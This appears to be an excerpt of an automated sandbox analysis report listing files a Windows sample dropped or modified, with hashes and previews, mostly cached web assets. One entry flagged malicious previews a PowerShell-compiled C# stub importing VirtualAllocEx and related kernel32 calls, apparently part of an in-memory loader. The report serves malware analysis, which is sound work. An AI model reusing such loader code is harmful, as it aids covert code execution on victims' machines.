SHA-512:	4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1.min.js
Preview:	/! jQuery v2.1.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\navigation[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	14934
Entropy (8bit):	5.859518670964781
Encrypted:	false
SSDEEP:	384:inRRfaX93XqRN0Gosli2+G6lDiOT+RjqxG7VRn90turGRiaX2gRhfzSRxkNGVh6h:iXfaX9nqRN0Gvli2+G6lDiOTTG7tYurs
MD5:	144F5DFB7C1A76EC2069838C8AC519B8
SHA1:	2B636D22C1B24006CD3C697912AA8E6673D848F4
SHA-256:	5563CDB209F42C951442447A6CFEBA703F100A2CE707253BD4378DE953E7ECCC
SHA-512:	715D1B87FEAFF5F5807708EA44FB12AF5BE3672EBBD24BC0C7C9BA233D59CED152C1D64378F9FA955F74098C15437D3A9E531CB5A427D081FC5E0BC93CCA265F
Malicious:	false
IE Cache URL:	https://s.uicdn.com/mailint/9.1722.0/assets/_sn_/css/mailcom/mod-navigation/navigation.css
Preview:	[data-mod-name=navigation]{font-family:Droid,sans-serif}@media (max-width:1023px){[data-mod-name=navigation]{display:block;float:left}[data-mod-name=navigation] .nav{display:block;height:auto;position:absolute;right:100%;top:0;width:24rem;background:#fff}[data-mod-name=navigation] .nav a,[data-mod-name=navigation] .nav span{box-sizing:border-box}[data-mod-name=navigation] .nav .offcanvas-item{display:block;height:4.4rem;width:100%;float:left}[data-mod-name=navigation] .nav .offcanvas-home{background:#1a1a1a no-repeat 1rem 50%;background-image:url("data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4KPCEtLSBHZW5lcmF0b3I6IEFkb2JlIElsbHVzdHJhdG9yIDI0LjMuMCwgU1ZHIEV4cG9ydCBQbHVnLUluIC4gU1ZHIFZlcnNpb246IDYuMDAgQnVpbGQgMCkgIC0tPgo8c3ZnIHZlcnNpb249IjEuMSIgaWQ9IkxheWVyXzEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiIHg9IjBweCIgeT0iMHB4IgoJIHZpZXdCb3g9IjAgMCA1NDIuNSAxNDUiIHN0eWxlPSJlbmFibGUtYmFja2dyb3VuZDpuZXcg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\potec.core.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	111258
Entropy (8bit):	5.4381870963107914
Encrypted:	false
SSDEEP:	1536:l4KqEY/YZa63sFA1jB/Ek3FUMbaPh3mIlySqsssVnQObnPCjthXk7VFNXUV:WM915EkKU/gossgbKkUV
MD5:	E9AF3F4A2E6427FBC89159FCF64CC603
SHA1:	7AD9130EE8ADC291CBC99FEA23F5EA479A78FFC9
SHA-256:	730E757AAA7ED9E9011A0DCF61AC2E8F91BEE8B22689A4F269D22189C1B9D6BF
SHA-512:	6B02DC5215143BF617CCA52A6B2D3E9F0E72AF4EB7529A4C08D4BB614EF047239B985EA688C03AA190C00C6C8F26BF8A970690C6847B3A1766E5D837FEAB97F1
Malicious:	false
IE Cache URL:	https://s.uicdn.com/mailint/9.1722.0/assets/potec.core.min.js
Preview:	PLOVR_MODULE_INFO={"core":[],"video2":["core"],"slideshow":["core"],"mig":["core"],"video":["core"]};.PLOVR_MODULE_URIS={"core":"/assets/potec.core.min.js","video2":"/assets/potec.video2.min.js","slideshow":"/assets/potec.slideshow.min.js","mig":"/assets/potec.mig.min.js","video":"/assets/potec.video.min.js"};.PLOVR_MODULE_USE_DEBUG_MODE=false;.var __potec__={};(function(z){.var g,l,aa,ba,ca,da,n,p,q,r,t,ea,fa,ga,v,ha,ja,y,sa,va,ua,wa,xa,za,ya,A,Ba,B,Ca,Da,Ea,Ha,Ia,C,Ka,Ma,Na,Oa,Pa,Qa,Sa,Ta,Ua,Va,Ya,Wa,bb,cb,E,gb,hb,jb,kb,mb,F,nb,ob,qb,rb,tb,vb,wb,xb,yb,zb,Cb,Db,ub,Fb,Eb,sb,Ib,Jb,Kb,Lb,J,Ob,Pb,Qb,K,Rb,Sb,Ub,Wb,Xb,Yb,Zb,$b,L,bc,ec,jc,kc,lc,fc,oc,nc,hc,cc,ac,qc,rc,uc,vc,wc,xc,yc,Bc,Cc,Dc,Ec,Fc,Gc,Hc,Ic,Jc,Oc,Lc,Pc,Vc,Wc,Yc,Zc,cd,ed,Tc,fd,bd,$c,ad,hd,gd,dd,N,jd,kd,ld,md,nd,od,qd,rd,sd,ud,td,vd,wd,xd,yd,zd,Bd,Ad,Cd,Gd,Ed,Id,Jd,Kd,Dd,Nd,Od,Pd,Qd,Rd,Sd,Td,Ud,Vd,Wd,Xd,$d,ae,.be,ce,de,ee,fe,ge,ie,je,ke,he,me,oe,pe,qe,re,xe,ye,we,ze,ve,te,ue,Ce,De,Ee,V,Ge,Ie,Je,Le,Fe,He,Oe,Ne,Re,Qe,Xe,Se,Te,Ue,

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\styles.mailcom.min[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	192203
Entropy (8bit):	5.182979578806931
Encrypted:	false
SSDEEP:	1536:bqUfaKfalUjvlRgUjvZRoV8ejheFeYTBT4TYXQHHK/yiyOyqjDjde751jvkKXDn9:b5yKyYe751jvV9
MD5:	EB9005F7F0941A03D288D5EA11D7F03B
SHA1:	1AD5000D6D061F96CAE9EFE1AF6140368734A6CE
SHA-256:	23DFD4F9EDF1E9DA31445911D9B41F71E81B98AF20CF53B6A431F99DE41155C9
SHA-512:	913365BC39A8387B614EC0F4351768BEFC3595617A59604612D9D3CAE5DC19BE8E0018440C42CB2DCF994965858481833174298D659DABA5695FDABD8184E9B5
Malicious:	false
IE Cache URL:	https://s.uicdn.com/mailint/9.1722.0/assets/styles.mailcom.min.css
Preview:	/! normalize.css v3.0.2 \| MIT License \| git.io/normalize /html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\t[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	modified
Size (bytes):	43
Entropy (8bit):	3.322445490340781
Encrypted:	false
SSDEEP:	3:CUdSkL1pse:XSk/se
MD5:	6D22E4F2D2057C6E8D6FAB098E76E80F
SHA1:	B80B11203D97FE01C5597CA3BE70406EA48F5709
SHA-256:	AFE0DCFCA292A0FAE8BCE08A48C14D3E59C9D82C6052AB6D48A22ECC6C48F277
SHA-512:	95DD0E4944B1541A9BE48A60A1A105FCFA0D69DD215ABAA9C1771ADECC5EE0C0FE91D0EB367B6D46A4F8B2E06E6FB962D56DFC1C53F1F62CC8B314710628CB1E
Malicious:	false
Preview:	GIF89a.............!.......,...........L..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\tcf-api[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines
Category:	downloaded
Size (bytes):	128314
Entropy (8bit):	5.420028842667526
Encrypted:	false
SSDEEP:	1536:X7ksrP0OQrmfB/JbkcORkJQbtirmDcPnj5tCOw/:X7vr0YfzIcOROQbt2uP
MD5:	351509155B57D12F6E63A0639E414F6B
SHA1:	23B00CFF48F01F215C883206B887C47DCB82C832
SHA-256:	2F930C675986DD3A373E3F76ADF2464CE9A1274B0B82B6FC85622F5801171C42
SHA-512:	7EE5B752428863943D500DC5428C33223AE0DD80EB985E8379F95E53176503F06A7C126819BFF0592FE16674ED22187823ECE54B6E173D844DD8A9AA58F942E2
Malicious:	false
IE Cache URL:	https://s.uicdn.com/tcf/live/v1/js/tcf-api.js
Preview:	var TcfApi=function(e){"use strict";var t,n;(t=e.TcfApiCommands\|\|(e.TcfApiCommands={}))[t.getTCData=0]="getTCData",t[t.ping=1]="ping",t[t.addEventListener=2]="addEventListener",t[t.removeEventListener=3]="removeEventListener",t[t.updateTCString=4]="updateTCString",t[t.getTCString=5]="getTCString",t[t.getACString=6]="getACString",t[t.getPermission=7]="getPermission",t[t.getTCFVersion=8]="getTCFVersion",t[t.getTCLastUpdated=9]="getTCLastUpdated",t[t.getTCStringUtil=10]="getTCStringUtil",t[t.getAppInfo=11]="getAppInfo",(n=e.PermissionFeatures\|\|(e.PermissionFeatures={}))[n.publisher=0]="publisher",n[n.purpose=1]="purpose",n[n.vendor=2]="vendor",n[n.special=3]="special",n[n.brainTracking=4]="brainTracking",n[n.uimservTracking=5]="uimservTracking",n[n.agofTracking=6]="agofTracking",n[n.tgp=7]="tgp",n[n.oewaTracking=8]="oewaTracking",n[n.googleAnalyticsTracking=9]="googleAnalyticsTracking",n[n.editorialPersonalization=10]="editorialPersonalization",n[n.aditionAds=11]="aditionAds",n[n.siteSpec

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\url-polyfill[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	14156
Entropy (8bit):	4.648608112922872
Encrypted:	false
SSDEEP:	192:mkV8iuOl2Rcop1xckycFecyKrceF1M3c/WEXiXr8j1bpwgxm7ke1mguem4j9qmmi:+p1zbMOWJrKzTxCk+n5jtnwbuR6wtw4l
MD5:	6A18FD44CC1ADDF80D15A41AB190EEA9
SHA1:	8855C0084EB46252D7CBCA2AA86F4D18247120F6
SHA-256:	6E80EED7AECA34625DBD62C4D627A76C3DE1D0F0509B7E503B920F9AD20AE037
SHA-512:	3748D8A038FBBAF734A5FA93FEB1BBB9CD406001F5BA340AD51B9050C2097864E19EFD6ADA813A306B2DE9C8ABA656A31C1FDFCB12F1E252EF6D76513C780650
Malicious:	false
IE Cache URL:	https://dl.mail.com/permission/live/v1.47.4/ppp/js/polyfills/url-polyfill.js
Preview:	(function(global) {.. /*.. Polyfill URLSearchParams.. .. Inspired from : https://github.com/WebReflection/url-search-params/blob/master/src/url-search-params.js.. /.... var checkIfIteratorIsSupported = function() {.. try {.. return !!Symbol.iterator;.. } catch (error) {.. return false;.. }.. };...... var iteratorSupported = checkIfIteratorIsSupported();.... var createIterator = function(items) {.. var iterator = {.. next: function() {.. var value = items.shift();.. return { done: value === void 0, value: value };.. }.. };.... if (iteratorSupported) {.. iterator[Symbol.iterator] = function() {.. return iterator;.. };.. }.... return iterator;.. };.... /.. Search param name and values should be encoded according to https://url.spec.whatwg.org/#urlencoded-serializing.. * encodeURIComponent() produces the same result except encoding spaces as `%20` instead of `+`... */.. var serialize

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\welcomeback[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	3161
Entropy (8bit):	5.3621867531457355
Encrypted:	false
SSDEEP:	48:drI6DEyr4yFUDxu8hpa5/M11LHBPmeplImEWZKUuADGB:6IihOUnHhmgltEOW
MD5:	9CF5B6DAE52A8E1110F3970BBF9C1918
SHA1:	06761FE2BE4BF9CDB1543E6471D475939AA99548
SHA-256:	92A5A34108CD7654CF0D9358F3DAD6747C80B3D9CB97F57C6A75ACB5441086CD
SHA-512:	10C275B6690554985090CB85A23F7EDF4E13BAAA9E4AAB36C36E2B42352C462D83E1666DCB3AC2C651B7B64B58905E650749F204BD21B6DFFAB3CBCAA59853DA
Malicious:	false
IE Cache URL:	https://s.uicdn.com/mailint/9.1722.0/assets/_sn_/css/mailcom/mod-welcomeback/welcomeback.css
Preview:	.close-bar,.dialogContent{width:1080px}.dialogOverlay{top:0;bottom:0;left:0;right:0;background-color:rgba(0,0,0,.6);z-index:9999;display:table;width:100%;height:100%;position:fixed;transition:background-color .3s ease-out}.dialogOverlay.fadeIn{background-color:rgba(0,0,0,.8)}.dialogWrapper{display:table-cell;vertical-align:middle;padding:0 10%;animation-duration:1s;animation-fill-mode:forwards;animation-timing-function:ease-out}.dialogWrapper.opened{animation-name:open}.dialogWrapper.closed{animation-name:close}.dialogWrapper.bouncein{animation-name:bounceIn}.dialogWrapper.bounceout{animation-name:bounceOut}.dialogContent{box-sizing:border-box;clear:both;overflow:auto;position:relative;color:#000;padding:0 2rem 2rem;box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07)}.close-bar,.dialogContent{margin:auto;background-color:#fff}.close-bar{height

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	11606
Entropy (8bit):	4.8910535897909355
Encrypted:	false
SSDEEP:	192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
MD5:	7A57D8959BFD0B97B364F902ACD60F90
SHA1:	7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
SHA-256:	47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
SHA-512:	83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
Malicious:	false
Preview:	PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Temp\RES1395.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.703078678989801
Encrypted:	false
SSDEEP:	24:p+fJUX1Kml4DfH7hKdNNI+ycuZhNhQakS2VPNnq9qpKe9Ep:cJUFL2lKd31ulya3Wq9l
MD5:	67EAD2B49BF2CB778AB885B340E5874F
SHA1:	1F6BC13D3DEAFE14C1FEA5CD8985DBB001F0808A
SHA-256:	CCBEF775C789CB75E5DC746E99D12990BB81D8D12E3BB4D0502942425EFF4769
SHA-512:	12F27E4DA27CD7133B4FC5C3145F9C9A9AB764BBFE8723A3DEC4133A6AEF14FD88DF71E476EF5BA08C00402D91556DB9A958DF3551874BFB34C840129409CFE7
Malicious:	false
Preview:	........T....c:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP..............."9....4...\.7.v..........4.......C:\Users\user\AppData\Local\Temp\RES1395.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RES1D78.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.701839308239234
Encrypted:	false
SSDEEP:	24:bZfdDfHfhKdNNI+ycuZhNhEakSwJPNnq9qp8e9Ep:bBhZKd31ulhEa3wrq9D
MD5:	BD381889D5D14BEBA3F245D6CAD024BB
SHA1:	4BF75564071B9CD46434A5E4F8F084F24DD9C807
SHA-256:	8B1FF3792EB5FB589442E56AB21028C4024A60D67A196598028305437617928C
SHA-512:	DECDD3A0A92C599D7E3FBE612F0A5580029377B425114232AC573A87AF592F68E16A7CB62D4AF5F874D248E2472DB982090C5ADC4D52AB4392A7A298ED28B7A4
Malicious:	false
Preview:	........S....c:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP.................M.m:'Jg>...y$&x..........4.......C:\Users\user\AppData\Local\Temp\RES1D78.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RES30B.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.6954360087544957
Encrypted:	false
SSDEEP:	24:p+fHnfHMhKdNfI+ycuZhN50akSGZPNnq9qpWe9Ep:cHf+Kd91ulWa3Cq9p
MD5:	7848C9A17A84D056D7CFC7DA38DCA609
SHA1:	DA425AB920A95840643441870E38EE476D96F775
SHA-256:	8778C392FB810EB31936C685D368577112D8A7F16BB4C6CC2F2995AAEF784900
SHA-512:	3B6CEA55BF95CE2DACF0BE5789835B95798E9F8E0BE76B9AC4703C343722D5A1B2F163472445379AFF32310F65A7EE1C2F75D10A00E32C22A19D167AD74DF930
Malicious:	false
Preview:	........T....c:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP...............C.Y..p4p..t..K...........3.......C:\Users\user\AppData\Local\Temp\RES30B.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RESD796.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.703014856361798
Encrypted:	false
SSDEEP:	24:p+fYa4DfH7hKdNNI+ycuZhN2fVakS/faPNnq9qpae9Ep:cJ2lKd31ul2da3/eq9V
MD5:	F4C9850B5713FCDB98239DBB08B231AD
SHA1:	5CCBEF4C478B059CDB9F8F2EF4690DE0DCD51ECC
SHA-256:	E3F4036557B8AF6EBF0669E489A646B8DC235FFDDE22E22A2A0CAE61B4E5AA1A
SHA-512:	A4D5F4DD71CA72544C7A5246D82F632DF2932495457039E1F7A1AD3ECCA463D5824AA47FC461447217E448856271C02981595F35791DBFEC8775FDCF50860E11
Malicious:	false
Preview:	........T....c:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP................M.v.D..0Y...t............4.......C:\Users\user\AppData\Local\Temp\RESD796.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1d1agx2n.y33.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cozqdysy.q2y.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izsawauy.agg.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lkwkfhsp.iho.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suoyht1j.cio.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tn44m1iy.dhy.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\mqjlkxcv\mqjlkxcv.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	412
Entropy (8bit):	4.988997636788378
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJUfmMRSRa+eNMjSSRrpNAx0H9SRHq1usvCDFhZJOqQy:V/DTLDfuV9eg5rpNADuuBfZAqQy
MD5:	FE2480BDBA6D62383E977D1307AB92FE
SHA1:	0EE873C3130667976A2BF6818ED39ADBFC3EED69
SHA-256:	AE285CBEF3EBFC69E6FEF51BA5967FD0FFAA8D8E05AFACABCF8A9604AF5DB4A0
SHA-512:	92740C188F74C23A1D49697C2113D84CAA4FCBD21BF52749ADCE4822CBACA6E1040ECC1E52F21F8A54709851A000A2EF66277C10FE51305417D530BE6761B894
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class gryv. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint smvdgeyph,uint fibsaspe);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr lacbaj,IntPtr pivx,uint tbqhioooo,uint rhbv,uint ebbtbfesjk);.. }..}.

C:\Users\user\AppData\Local\Temp\mqjlkxcv\mqjlkxcv.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.313290378229237
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f9xfLUzxs7+AEszIwkn23f9xfF:p37Lvkmb6KRflxzUWZEiflxd
MD5:	BAEDA6D87EF34654BBFD2591421EA2E4
SHA1:	E22D50EBF8AEF8A43DBF998C8C79A2592C6DE9CB
SHA-256:	321AEB3D2A1988B4433D93F0E20E1AA404C0017434C78B43DE26B8C2C1EE738A
SHA-512:	491AC71968F4555BF35FC1C29820276764BF65D579351E4CCD7BD391B48F11630132D4314BADF6FAAFD5610403C763F1B7C96FF54C27EBBB6D2325C2F9E6603E
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mqjlkxcv\mqjlkxcv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mqjlkxcv\mqjlkxcv.0.cs"

C:\Users\user\AppData\Local\Temp\mqjlkxcv\mqjlkxcv.out Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	modified
Size (bytes):	454
Entropy (8bit):	5.418122067699914
Encrypted:	false
